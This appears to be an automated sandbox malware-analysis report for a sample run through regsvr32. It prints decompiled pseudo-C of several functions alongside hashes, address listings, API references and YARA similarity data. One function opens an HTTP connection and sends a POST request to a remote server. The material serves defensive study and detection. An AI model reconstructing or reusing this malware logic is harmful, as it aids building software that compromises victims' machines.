                                                                                                                                                                                              • API String ID: 667068680-129414566
                                                                                                                                                                                              • Opcode ID: d515c3e0222855632e8568af29d3529983bb32a5c409a725b5a76f9ccd45e5e6
                                                                                                                                                                                              • Instruction ID: 4bd46bfffc0958b676d976bfc90f0222157fc60933c4a6de5cce02c70f69d65a
                                                                                                                                                                                              • Opcode Fuzzy Hash: d515c3e0222855632e8568af29d3529983bb32a5c409a725b5a76f9ccd45e5e6
                                                                                                                                                                                              • Instruction Fuzzy Hash: 15118672F60B07B7EB1196A49C49FDEB7AC9F457D0F2500A1E684F6140DA70FA418AF8
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 042AF7A6 Relevance: 12.3, APIs: 7, Strings: 1, Instructions: 267COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              C-Code - Quality: 93%
                                                                                                                                                                                              			E042AF7A6(void* __edx, intOrPtr _a4, intOrPtr _a8, signed int* _a12, signed int* _a16, signed int* _a20, signed int _a24) {
				signed int _v8;
				signed int _v12;
				char _v16;
				char _v20;
				char _v24;
				intOrPtr _v28;
				int _v32;
				signed int _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				char _v56;
				int _v68;
				void* _v72;
				intOrPtr _v92;
				int _v96;
				void* _v100;
				intOrPtr _v104;
				intOrPtr _v108;
				char* _v112;
				char _v116;
				char _v132;
				void _v388;
				void _v644;
				intOrPtr _t94;
				intOrPtr _t102;
				signed int _t104;
				intOrPtr* _t105;
				intOrPtr _t110;
				signed int _t111;
				signed int _t112;
				intOrPtr _t115;
				signed int _t116;
				char _t117;
				intOrPtr _t119;
				char _t122;
				intOrPtr _t127;
				signed int _t129;
				intOrPtr _t135;
				intOrPtr _t139;
				intOrPtr _t143;
				intOrPtr _t145;
				intOrPtr _t147;
				intOrPtr _t153;
				intOrPtr _t155;
				intOrPtr _t159;
				void* _t163;
				signed int _t165;
				intOrPtr _t179;
				signed int _t186;
				char _t188;
				signed int _t189;
				void* _t190;
				char _t193;
				signed int _t194;
				signed int _t195;
				void* _t196;

				_v24 = 4;
				_v32 = 0;
				_v28 = 1;
				_t190 = __edx;
				memset( &_v388, 0, 0x100);
				memset( &_v644, 0, 0x100);
				_v56 = E042A9DD8(0xd62);
				_v52 = E042A9DD8(0x8e9);
				_v48 = E042A9DD8(0xa93);
				_v44 = E042A9DD8(0x9a9);
				_t94 = E042A9DD8(0xb64);
				_v36 = _v36 & 0;
				_t188 = 0x3c;
				_v40 = _t94;
				E042A8D6D( &_v116, 0, 0x100);
				_v108 = 0x10;
				_v112 =  &_v132;
				_v116 = _t188;
				_v100 =  &_v388;
				_v96 = 0x100;
				_v72 =  &_v644;
				_push( &_v116);
				_push(0);
				_v68 = 0x100;
				_push(E042AA43D(_t190));
				_t102 =  *0x42bf838; // 0x0
				_push(_t190);
				if( *((intOrPtr*)(_t102 + 0x28))() != 0) {
					_t104 = 0;
					__eflags = 0;
					_v12 = 0;
					do {
						_t105 =  *0x42bf838; // 0x0
						_v8 = 0x8404f700;
						_t189 =  *_t105( *0x42bf920,  *((intOrPtr*)(_t196 + _t104 * 4 - 0x1c)), 0, 0, 0);
						__eflags = _t189;
						if(_t189 != 0) {
							E042AF73E(_t189);
							_t110 =  *0x42bf838; // 0x0
							_t111 =  *((intOrPtr*)(_t110 + 0x1c))(_t189,  &_v388, _v92, 0, 0, 3, 0, 0);
							__eflags = _a24;
							_t165 = _t111;
							if(_a24 != 0) {
								E042AA065(_a24);
							}
							__eflags = _t165;
							if(_t165 != 0) {
								__eflags = _v104 - 4;
								_t112 = 0x8484f700;
								if(_v104 != 4) {
									_t112 = _v8;
								}
								_t115 =  *0x42bf838; // 0x0
								_t116 =  *((intOrPtr*)(_t115 + 0x20))(_t165, "POST",  &_v644, 0, 0,  &_v56, _t112, 0);
								_v8 = _t116;
								__eflags = _a24;
								if(_a24 != 0) {
									E042AA065(_a24);
									_t116 = _v8;
								}
								__eflags = _t116;
								if(_t116 != 0) {
									__eflags = _v104 - 4;
									if(_v104 == 4) {
										E042AF6EC(_t116);
									}
									_t117 = E042A9DD8(0x901);
									_t193 = _t117;
									_v16 = _t193;
									_t119 =  *0x42bf838; // 0x0
									_t194 = _v8;
									_v8 =  *((intOrPtr*)(_t119 + 0x24))(_t194, _t193, E042AA43D(_t193), _a4, _a8);
									E042A8B9C( &_v16);
									__eflags = _a24;
									if(_a24 != 0) {
										E042AA065(_a24);
									}
									__eflags = _v8;
									if(_v8 != 0) {
										L25:
										_t122 = 8;
										_v24 = _t122;
										_v20 = 0;
										_v16 = 0;
										E042A8D6D( &_v20, 0, _t122);
										_t127 =  *0x42bf838; // 0x0
										__eflags =  *((intOrPtr*)(_t127 + 0xc))(_t194, 0x13,  &_v20,  &_v24, 0);
										if(__eflags != 0) {
											_t129 = E042A9F6F( &_v20, __eflags);
											__eflags = _t129 - 0xc8;
											if(_t129 == 0xc8) {
												 *_a20 = _t194;
												 *_a12 = _t189;
												 *_a16 = _t165;
												__eflags = 0;
												return 0;
											}
											_v12 =  ~_t129;
											L29:
											_t135 =  *0x42bf838; // 0x0
											 *((intOrPtr*)(_t135 + 8))(_t194);
											_t195 = _v12;
											L30:
											__eflags = _t165;
											if(_t165 != 0) {
												_t139 =  *0x42bf838; // 0x0
												 *((intOrPtr*)(_t139 + 8))(_t165);
											}
											__eflags = _t189;
											if(_t189 != 0) {
												_t179 =  *0x42bf838; // 0x0
												 *((intOrPtr*)(_t179 + 8))(_t189);
											}
											return _t195;
										}
										GetLastError();
										_v12 = 0xfffffff8;
										goto L29;
									} else {
										GetLastError();
										_t143 =  *0x42bf838; // 0x0
										 *((intOrPtr*)(_t143 + 8))(_t194);
										_t145 =  *0x42bf838; // 0x0
										_v8 = _v8 & 0x00000000;
										 *((intOrPtr*)(_t145 + 8))(_t165);
										_t147 =  *0x42bf838; // 0x0
										_t165 = 0;
										__eflags = 0;
										 *((intOrPtr*)(_t147 + 8))(_t189);
										_t194 = _v8;
										goto L21;
									}
								} else {
									GetLastError();
									_t153 =  *0x42bf838; // 0x0
									 *((intOrPtr*)(_t153 + 8))(_t165);
									_t155 =  *0x42bf838; // 0x0
									_t165 = 0;
									 *((intOrPtr*)(_t155 + 8))(_t189);
									_t189 = 0;
									_t194 = _v8;
									goto L22;
								}
							} else {
								GetLastError();
								_t159 =  *0x42bf838; // 0x0
								 *((intOrPtr*)(_t159 + 8))(_t189);
								L21:
								_t189 = 0;
								__eflags = 0;
								goto L22;
							}
						}
						GetLastError();
						L22:
						_t186 = _t194;
						_t104 = _v12 + 1;
						_v12 = _t104;
						__eflags = _t104 - 2;
					} while (_t104 < 2);
					__eflags = _t186;
					if(_t186 != 0) {
						goto L25;
					}
					_t195 = 0xfffffffe;
					goto L30;
				}
				_t163 = 0xfffffffc;
				return _t163;
			}





























































                                                                                                                                                                                              0x042af7b4
                                                                                                                                                                                              0x042af7c0
                                                                                                                                                                                              0x042af7c7
                                                                                                                                                                                              0x042af7d4
                                                                                                                                                                                              0x042af7d7
                                                                                                                                                                                              0x042af7e8
                                                                                                                                                                                              0x042af7ff
                                                                                                                                                                                              0x042af80c
                                                                                                                                                                                              0x042af819
                                                                                                                                                                                              0x042af826
                                                                                                                                                                                              0x042af829
                                                                                                                                                                                              0x042af82e
                                                                                                                                                                                              0x042af833
                                                                                                                                                                                              0x042af835
                                                                                                                                                                                              0x042af83d
                                                                                                                                                                                              0x042af845
                                                                                                                                                                                              0x042af84c
                                                                                                                                                                                              0x042af858
                                                                                                                                                                                              0x042af85b
                                                                                                                                                                                              0x042af869
                                                                                                                                                                                              0x042af86c
                                                                                                                                                                                              0x042af872
                                                                                                                                                                                              0x042af873
                                                                                                                                                                                              0x042af875
                                                                                                                                                                                              0x042af87e
                                                                                                                                                                                              0x042af87f
                                                                                                                                                                                              0x042af884
                                                                                                                                                                                              0x042af88a
                                                                                                                                                                                              0x042af894
                                                                                                                                                                                              0x042af894
                                                                                                                                                                                              0x042af896
                                                                                                                                                                                              0x042af89b
                                                                                                                                                                                              0x042af8a5
                                                                                                                                                                                              0x042af8b0
                                                                                                                                                                                              0x042af8b9
                                                                                                                                                                                              0x042af8bb
                                                                                                                                                                                              0x042af8bd
                                                                                                                                                                                              0x042af8cc
                                                                                                                                                                                              0x042af8e3
                                                                                                                                                                                              0x042af8e9
                                                                                                                                                                                              0x042af8ec
                                                                                                                                                                                              0x042af8f0
                                                                                                                                                                                              0x042af8f2
                                                                                                                                                                                              0x042af8f7
                                                                                                                                                                                              0x042af8f7
                                                                                                                                                                                              0x042af8fc
                                                                                                                                                                                              0x042af8fe
                                                                                                                                                                                              0x042af914
                                                                                                                                                                                              0x042af918
                                                                                                                                                                                              0x042af91d
                                                                                                                                                                                              0x042af91f
                                                                                                                                                                                              0x042af91f
                                                                                                                                                                                              0x042af933
                                                                                                                                                                                              0x042af93e
                                                                                                                                                                                              0x042af941
                                                                                                                                                                                              0x042af944
                                                                                                                                                                                              0x042af947
                                                                                                                                                                                              0x042af94c
                                                                                                                                                                                              0x042af951
                                                                                                                                                                                              0x042af951
                                                                                                                                                                                              0x042af954
                                                                                                                                                                                              0x042af956
                                                                                                                                                                                              0x042af97c
                                                                                                                                                                                              0x042af980
                                                                                                                                                                                              0x042af984
                                                                                                                                                                                              0x042af984
                                                                                                                                                                                              0x042af98e
                                                                                                                                                                                              0x042af996
                                                                                                                                                                                              0x042af99b
                                                                                                                                                                                              0x042af9a6
                                                                                                                                                                                              0x042af9ac
                                                                                                                                                                                              0x042af9b6
                                                                                                                                                                                              0x042af9b9
                                                                                                                                                                                              0x042af9be
                                                                                                                                                                                              0x042af9c2
                                                                                                                                                                                              0x042af9c7
                                                                                                                                                                                              0x042af9c7
                                                                                                                                                                                              0x042af9cc
                                                                                                                                                                                              0x042af9d0
                                                                                                                                                                                              0x042afa1b
                                                                                                                                                                                              0x042afa1d
                                                                                                                                                                                              0x042afa20
                                                                                                                                                                                              0x042afa28
                                                                                                                                                                                              0x042afa2c
                                                                                                                                                                                              0x042afa2f
                                                                                                                                                                                              0x042afa41
                                                                                                                                                                                              0x042afa4c
                                                                                                                                                                                              0x042afa4e
                                                                                                                                                                                              0x042afa62
                                                                                                                                                                                              0x042afa67
                                                                                                                                                                                              0x042afa6c
                                                                                                                                                                                              0x042afaa1
                                                                                                                                                                                              0x042afaa6
                                                                                                                                                                                              0x042afaab
                                                                                                                                                                                              0x042afaad
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x042afaad
                                                                                                                                                                                              0x042afa70
                                                                                                                                                                                              0x042afa73
                                                                                                                                                                                              0x042afa73
                                                                                                                                                                                              0x042afa79
                                                                                                                                                                                              0x042afa7c
                                                                                                                                                                                              0x042afa7f
                                                                                                                                                                                              0x042afa7f
                                                                                                                                                                                              0x042afa81
                                                                                                                                                                                              0x042afa83
                                                                                                                                                                                              0x042afa89
                                                                                                                                                                                              0x042afa89
                                                                                                                                                                                              0x042afa8c
                                                                                                                                                                                              0x042afa8e
                                                                                                                                                                                              0x042afa90
                                                                                                                                                                                              0x042afa97
                                                                                                                                                                                              0x042afa97
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x042afa9a
                                                                                                                                                                                              0x042afa50
                                                                                                                                                                                              0x042afa56
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x042af9d2
                                                                                                                                                                                              0x042af9d2
                                                                                                                                                                                              0x042af9d8
                                                                                                                                                                                              0x042af9de
                                                                                                                                                                                              0x042af9e1
                                                                                                                                                                                              0x042af9e6
                                                                                                                                                                                              0x042af9eb
                                                                                                                                                                                              0x042af9ee
                                                                                                                                                                                              0x042af9f3
                                                                                                                                                                                              0x042af9f3
                                                                                                                                                                                              0x042af9f6
                                                                                                                                                                                              0x042af9f9
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x042af9f9
                                                                                                                                                                                              0x042af958
                                                                                                                                                                                              0x042af958
                                                                                                                                                                                              0x042af95e
                                                                                                                                                                                              0x042af964
                                                                                                                                                                                              0x042af967
                                                                                                                                                                                              0x042af96c
                                                                                                                                                                                              0x042af96f
                                                                                                                                                                                              0x042af972
                                                                                                                                                                                              0x042af974
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x042af974
                                                                                                                                                                                              0x042af900
                                                                                                                                                                                              0x042af900
                                                                                                                                                                                              0x042af906
                                                                                                                                                                                              0x042af90c
                                                                                                                                                                                              0x042af9fc
                                                                                                                                                                                              0x042af9fc
                                                                                                                                                                                              0x042af9fc
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x042af9fc
                                                                                                                                                                                              0x042af8fe
                                                                                                                                                                                              0x042af8bf
                                                                                                                                                                                              0x042af9fe
                                                                                                                                                                                              0x042afa01
                                                                                                                                                                                              0x042afa03
                                                                                                                                                                                              0x042afa06
                                                                                                                                                                                              0x042afa09
                                                                                                                                                                                              0x042afa09
                                                                                                                                                                                              0x042afa12
                                                                                                                                                                                              0x042afa14
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x042afa18
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x042afa18
                                                                                                                                                                                              0x042af88e
                                                                                                                                                                                              0x00000000

                                                                                                                                                                                              APIs
                                                                                                                                                                                              • memset.MSVCRT ref: 042AF7D7
                                                                                                                                                                                              • memset.MSVCRT ref: 042AF7E8
                                                                                                                                                                                                • Part of subcall function 042A8D6D: memset.MSVCRT ref: 042A8D7F
                                                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,?,?,?,00000000,000007D0,00000000), ref: 042AF8BF
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 0000001C.00000002.673063332.00000000042A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042A0000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_28_2_42a0000_regsvr32.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: memset$ErrorLast
                                                                                                                                                                                              • String ID: POST
                                                                                                                                                                                              • API String ID: 2570506013-1814004025
                                                                                                                                                                                              • Opcode ID: 4dd1cca93930c6b0898d3180ea325c587efb2d45b0903db7f2fd069183521290
                                                                                                                                                                                              • Instruction ID: 9ea07c55d7c63828ea5b83dbb9cc23f08703cf5b0dc80c71f34e0cd03ebba13a
                                                                                                                                                                                              • Opcode Fuzzy Hash: 4dd1cca93930c6b0898d3180ea325c587efb2d45b0903db7f2fd069183521290
                                                                                                                                                                                              • Instruction Fuzzy Hash: 8DA19171B10219EFDB10EFA8E948AEE77B8EF08314F114469F905E7250D778AE55CB90
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 042B1464 Relevance: 10.9, APIs: 2, Strings: 4, Instructions: 445COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 0000001C.00000002.673063332.00000000042A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042A0000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_28_2_42a0000_regsvr32.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: _snprintfqsort
                                                                                                                                                                                              • String ID: %I64d$false$null$true
                                                                                                                                                                                              • API String ID: 756996078-4285102228
                                                                                                                                                                                              • Opcode ID: 6e5a9e7886dca1bf57d0fcb7acf9d82e22841c67d5ff0632b7d06565b1a8a245
                                                                                                                                                                                              • Instruction ID: 5953ca91553a4706ff5e55b61f80aa83d2e387b91b76a4d6a56f773d33a7ac9f
                                                                                                                                                                                              • Opcode Fuzzy Hash: 6e5a9e7886dca1bf57d0fcb7acf9d82e22841c67d5ff0632b7d06565b1a8a245
                                                                                                                                                                                              • Instruction Fuzzy Hash: 26E15BB2B2020ABBEF159E64DC55EFB3B69EF043C4F008015FD9596140E671EA719BE1
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 042A50B3 Relevance: 9.3, APIs: 6, Instructions: 263stringCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              C-Code - Quality: 85%
                                                                                                                                                                                              			E042A50B3(void* __ecx, void* __edx, void* __fp0, intOrPtr* _a4, WCHAR* _a8, signed int _a12) {
				void _v532;
				char _v548;
				char _v580;
				char _v584;
				signed int _v588;
				intOrPtr _v592;
				WCHAR* _v596;
				char _v600;
				intOrPtr _v604;
				char _v632;
				char _v636;
				void* __ebx;
				void* __esi;
				intOrPtr _t56;
				char _t63;
				intOrPtr _t65;
				intOrPtr _t66;
				signed int _t72;
				void* _t76;
				void* _t77;
				signed int _t78;
				intOrPtr _t79;
				signed int _t81;
				intOrPtr _t82;
				WCHAR* _t84;
				intOrPtr _t94;
				intOrPtr _t95;
				void* _t96;
				intOrPtr _t97;
				signed char _t104;
				void* _t107;
				intOrPtr _t108;
				intOrPtr _t110;
				void* _t113;
				void* _t114;
				WCHAR* _t115;
				void* _t126;
				WCHAR* _t130;
				intOrPtr _t142;
				void* _t143;
				void* _t163;
				signed int _t166;
				void* _t167;
				void* _t169;
				void* _t173;
				signed int _t174;
				WCHAR* _t176;
				signed int _t177;
				signed int _t178;
				intOrPtr* _t180;
				signed int _t182;
				void* _t185;
				void* _t186;
				WCHAR** _t187;
				void* _t192;

				_t192 = __fp0;
				_push(_t177);
				_t113 = __edx;
				_t173 = __ecx;
				_t178 = _t177 | 0xffffffff;
				memset( &_v532, 0, 0x20c);
				_v588 = _v588 & 0x00000000;
				_t185 = (_t182 & 0xfffffff8) - 0x254 + 0xc;
				_v596 = 1;
				if(_t173 != 0) {
					_t108 =  *0x42bf81c; // 0x48efbe8
					_t5 = _t108 + 0x110; // 0x48f16b8
					_t110 =  *0x42bf820; // 0x48efaa0
					_v604 =  *((intOrPtr*)(_t110 + 0x68))(_t173,  *((intOrPtr*)( *_t5)));
				}
				if(E042AC9F4(_t173) != 0) {
					L4:
					_t56 = E042AC6CE();
					_push(_t113);
					_v592 = _t56;
					E042AC4C1(_t56,  &_v580, _t190, _t192);
					_t114 = E042A5072( &_v580,  &_v580, _t190);
					_t126 = E042AE2C5( &_v580, E042AA43D( &_v580), 0);
					E042AC6E4(_t126,  &_v548, _t192);
					_push(_t126);
					_t161 =  &_v580;
					_t63 = E042A317E(_t173,  &_v580, _t190, _t192);
					_v600 = _t63;
					if(_t63 != 0) {
						_push(0);
						_push(_t114);
						_push(0x42bc9a0);
						_t115 = E042A9A5A(_t63);
						_t186 = _t185 + 0x10;
						_t65 =  *0x42bf81c; // 0x48efbe8
						__eflags =  *((intOrPtr*)(_t65 + 0x214)) - 3;
						if( *((intOrPtr*)(_t65 + 0x214)) != 3) {
							L12:
							__eflags = _v596;
							if(__eflags != 0) {
								_t66 = E042A98BD(_v600);
								_t130 = _t115;
								 *0x42bf8d8 = _t66;
								 *0x42bf8d0 = E042A98BD(_t130);
								L17:
								_push(_t130);
								_t174 = E042AA633( &_v532, _t173, _t192, _v592,  &_v584,  &_v600);
								_t187 = _t186 + 0x10;
								__eflags = _t174;
								if(_t174 == 0) {
									goto L41;
								}
								_push(0x42bc9f2);
								_t163 = 0xe;
								E042AAAA3(_t163, _t192);
								E042AAADC(_t174, _t192, _t115);
								_t180 = _a4;
								_push( *_t180);
								E042AAA7E(0xb);
								_t165 =  *(_t180 + 0x10);
								__eflags =  *(_t180 + 0x10);
								if( *(_t180 + 0x10) != 0) {
									E042AB025(_t165, _t192);
								}
								_t166 =  *(_t180 + 0xc);
								__eflags = _t166;
								if(_t166 != 0) {
									E042AB025(_t166, _t192);
								}
								_t76 = E042AA065(0);
								_push(_t166);
								_t167 = 2;
								_t77 = E042AAA50();
								__eflags = _v596;
								_t142 = _t76;
								if(_v596 == 0) {
									_t142 =  *0x42bf81c; // 0x48efbe8
									__eflags =  *((intOrPtr*)(_t142 + 0xa4)) - 1;
									if(__eflags != 0) {
										_t78 = E042B0D7E(_t77, _t115, _t167, _t192, 0, _t115, 0);
										_t187 =  &(_t187[3]);
										goto L26;
									}
									_t142 = _t142 + 0x228;
									goto L25;
								} else {
									_t79 =  *0x42bf81c; // 0x48efbe8
									__eflags =  *((intOrPtr*)(_t79 + 0xa4)) - 1;
									if(__eflags != 0) {
										L32:
										__eflags =  *(_t79 + 0x1898) & 0x00000082;
										if(( *(_t79 + 0x1898) & 0x00000082) != 0) {
											_t169 = 0x64;
											E042AF0DE(_t169);
										}
										E042A584B( &_v580, _t192);
										_t176 = _a8;
										_t143 = _t142;
										__eflags = _t176;
										if(_t176 != 0) {
											_t82 =  *0x42bf81c; // 0x48efbe8
											__eflags =  *((intOrPtr*)(_t82 + 0xa0)) - 1;
											if( *((intOrPtr*)(_t82 + 0xa0)) != 1) {
												lstrcpyW(_t176, _t115);
											} else {
												_t84 = E042A109A(_t143, 0x49f);
												_v596 = _t84;
												lstrcpyW(_t176, _t84);
												E042A8BAF( &_v596);
												 *_t187 = 0x42bc9b0;
												lstrcatW(_t176, ??);
												lstrcatW(_t176, _t115);
												lstrcatW(_t176, 0x42bc9b0);
											}
										}
										_t81 = _a12;
										__eflags = _t81;
										if(_t81 != 0) {
											 *_t81 = _v592;
										}
										_t178 = 0;
										__eflags = 0;
										goto L41;
									}
									_t40 = _t79 + 0x228; // 0x48efe10
									_t142 = _t40;
									L25:
									_t78 = E042A5AC0(_t142, _t115, __eflags);
									L26:
									__eflags = _t78;
									if(_t78 >= 0) {
										_t79 =  *0x42bf81c; // 0x48efbe8
										goto L32;
									}
									_push(0xfffffffd);
									L6:
									_pop(_t178);
									goto L41;
								}
							}
							_t94 = E042AD11F(_v592, __eflags);
							_v600 = _t94;
							_t95 =  *0x42bf818; // 0x48ef8b0
							_t96 =  *((intOrPtr*)(_t95 + 0xdc))(_t94, 0x80003, 6, 0xff, 0x400, 0x400, 0, 0);
							__eflags = _t96 - _t178;
							if(_t96 != _t178) {
								_t97 =  *0x42bf818; // 0x48ef8b0
								 *((intOrPtr*)(_t97 + 0x30))();
								E042A8BF4( &_v636, _t178);
								_t130 = _t96;
								goto L17;
							}
							E042A8BF4( &_v632, _t178);
							_t72 = 1;
							goto L42;
						}
						_t18 = _t65 + 0x1898; // 0x0
						_t104 =  *_t18;
						__eflags = _t104 & 0x00000004;
						if((_t104 & 0x00000004) == 0) {
							__eflags = _t104;
							if(_t104 != 0) {
								goto L12;
							}
							L11:
							E042AF1F6(_v600, _t161);
							goto L12;
						}
						E042AF1B6(_v600,  &_v580);
						goto L11;
					}
					_push(0xfffffffe);
					goto L6;
				} else {
					_t107 = E042A3097( &_v532, _t178, 0x105);
					_t190 = _t107;
					if(_t107 == 0) {
						L41:
						E042A5F6F( &_v588);
						_t72 = _t178;
						L42:
						return _t72;
					}
					goto L4;
				}
			}


























































                                                                                                                                                                                              0x042a50b3
                                                                                                                                                                                              0x042a50c0
                                                                                                                                                                                              0x042a50cb
                                                                                                                                                                                              0x042a50d0
                                                                                                                                                                                              0x042a50d2
                                                                                                                                                                                              0x042a50d5
                                                                                                                                                                                              0x042a50da
                                                                                                                                                                                              0x042a50df
                                                                                                                                                                                              0x042a50e2
                                                                                                                                                                                              0x042a50ec
                                                                                                                                                                                              0x042a50ee
                                                                                                                                                                                              0x042a50f3
                                                                                                                                                                                              0x042a50fb
                                                                                                                                                                                              0x042a5104
                                                                                                                                                                                              0x042a5104
                                                                                                                                                                                              0x042a5111
                                                                                                                                                                                              0x042a512c
                                                                                                                                                                                              0x042a512e
                                                                                                                                                                                              0x042a5133
                                                                                                                                                                                              0x042a5138
                                                                                                                                                                                              0x042a513e
                                                                                                                                                                                              0x042a514d
                                                                                                                                                                                              0x042a516c
                                                                                                                                                                                              0x042a516e
                                                                                                                                                                                              0x042a5173
                                                                                                                                                                                              0x042a5174
                                                                                                                                                                                              0x042a517a
                                                                                                                                                                                              0x042a517f
                                                                                                                                                                                              0x042a5186
                                                                                                                                                                                              0x042a5190
                                                                                                                                                                                              0x042a5192
                                                                                                                                                                                              0x042a5193
                                                                                                                                                                                              0x042a519e
                                                                                                                                                                                              0x042a51a0
                                                                                                                                                                                              0x042a51a3
                                                                                                                                                                                              0x042a51a8
                                                                                                                                                                                              0x042a51af
                                                                                                                                                                                              0x042a51d3
                                                                                                                                                                                              0x042a51d3
                                                                                                                                                                                              0x042a51d8
                                                                                                                                                                                              0x042a523f
                                                                                                                                                                                              0x042a5244
                                                                                                                                                                                              0x042a5246
                                                                                                                                                                                              0x042a5250
                                                                                                                                                                                              0x042a5255
                                                                                                                                                                                              0x042a5255
                                                                                                                                                                                              0x042a526f
                                                                                                                                                                                              0x042a5271
                                                                                                                                                                                              0x042a5274
                                                                                                                                                                                              0x042a5276
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x042a527c
                                                                                                                                                                                              0x042a5283
                                                                                                                                                                                              0x042a5286
                                                                                                                                                                                              0x042a528f
                                                                                                                                                                                              0x042a5294
                                                                                                                                                                                              0x042a529a
                                                                                                                                                                                              0x042a529f
                                                                                                                                                                                              0x042a52a4
                                                                                                                                                                                              0x042a52a8
                                                                                                                                                                                              0x042a52aa
                                                                                                                                                                                              0x042a52ae
                                                                                                                                                                                              0x042a52ae
                                                                                                                                                                                              0x042a52b3
                                                                                                                                                                                              0x042a52b6
                                                                                                                                                                                              0x042a52b8
                                                                                                                                                                                              0x042a52bc
                                                                                                                                                                                              0x042a52bc
                                                                                                                                                                                              0x042a52c3
                                                                                                                                                                                              0x042a52c8
                                                                                                                                                                                              0x042a52cc
                                                                                                                                                                                              0x042a52cf
                                                                                                                                                                                              0x042a52d4
                                                                                                                                                                                              0x042a52da
                                                                                                                                                                                              0x042a52db
                                                                                                                                                                                              0x042a5303
                                                                                                                                                                                              0x042a5309
                                                                                                                                                                                              0x042a5310
                                                                                                                                                                                              0x042a531f
                                                                                                                                                                                              0x042a5324
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x042a5324
                                                                                                                                                                                              0x042a5312
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x042a52dd
                                                                                                                                                                                              0x042a52dd
                                                                                                                                                                                              0x042a52e2
                                                                                                                                                                                              0x042a52e9
                                                                                                                                                                                              0x042a532e
                                                                                                                                                                                              0x042a532e
                                                                                                                                                                                              0x042a5335
                                                                                                                                                                                              0x042a5339
                                                                                                                                                                                              0x042a533a
                                                                                                                                                                                              0x042a533a
                                                                                                                                                                                              0x042a5344
                                                                                                                                                                                              0x042a5349
                                                                                                                                                                                              0x042a534c
                                                                                                                                                                                              0x042a534d
                                                                                                                                                                                              0x042a534f
                                                                                                                                                                                              0x042a5351
                                                                                                                                                                                              0x042a5356
                                                                                                                                                                                              0x042a535d
                                                                                                                                                                                              0x042a53a0
                                                                                                                                                                                              0x042a535f
                                                                                                                                                                                              0x042a5364
                                                                                                                                                                                              0x042a536c
                                                                                                                                                                                              0x042a5370
                                                                                                                                                                                              0x042a537b
                                                                                                                                                                                              0x042a5386
                                                                                                                                                                                              0x042a538e
                                                                                                                                                                                              0x042a5392
                                                                                                                                                                                              0x042a539a
                                                                                                                                                                                              0x042a539a
                                                                                                                                                                                              0x042a535d
                                                                                                                                                                                              0x042a53a6
                                                                                                                                                                                              0x042a53a9
                                                                                                                                                                                              0x042a53ab
                                                                                                                                                                                              0x042a53b1
                                                                                                                                                                                              0x042a53b1
                                                                                                                                                                                              0x042a53b3
                                                                                                                                                                                              0x042a53b3
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x042a53b3
                                                                                                                                                                                              0x042a52eb
                                                                                                                                                                                              0x042a52eb
                                                                                                                                                                                              0x042a52f1
                                                                                                                                                                                              0x042a52f3
                                                                                                                                                                                              0x042a52f8
                                                                                                                                                                                              0x042a52f8
                                                                                                                                                                                              0x042a52fa
                                                                                                                                                                                              0x042a5329
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x042a5329
                                                                                                                                                                                              0x042a52fc
                                                                                                                                                                                              0x042a518a
                                                                                                                                                                                              0x042a518a
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x042a518a
                                                                                                                                                                                              0x042a52db
                                                                                                                                                                                              0x042a51de
                                                                                                                                                                                              0x042a51ec
                                                                                                                                                                                              0x042a51ff
                                                                                                                                                                                              0x042a5204
                                                                                                                                                                                              0x042a520a
                                                                                                                                                                                              0x042a520c
                                                                                                                                                                                              0x042a5224
                                                                                                                                                                                              0x042a5229
                                                                                                                                                                                              0x042a5232
                                                                                                                                                                                              0x042a5238
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x042a5238
                                                                                                                                                                                              0x042a5214
                                                                                                                                                                                              0x042a521d
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x042a521d
                                                                                                                                                                                              0x042a51b1
                                                                                                                                                                                              0x042a51b1
                                                                                                                                                                                              0x042a51b7
                                                                                                                                                                                              0x042a51b9
                                                                                                                                                                                              0x042a51c6
                                                                                                                                                                                              0x042a51c8
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x042a51ca
                                                                                                                                                                                              0x042a51ce
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x042a51ce
                                                                                                                                                                                              0x042a51bf
                                                                                                                                                                                              0x00000000
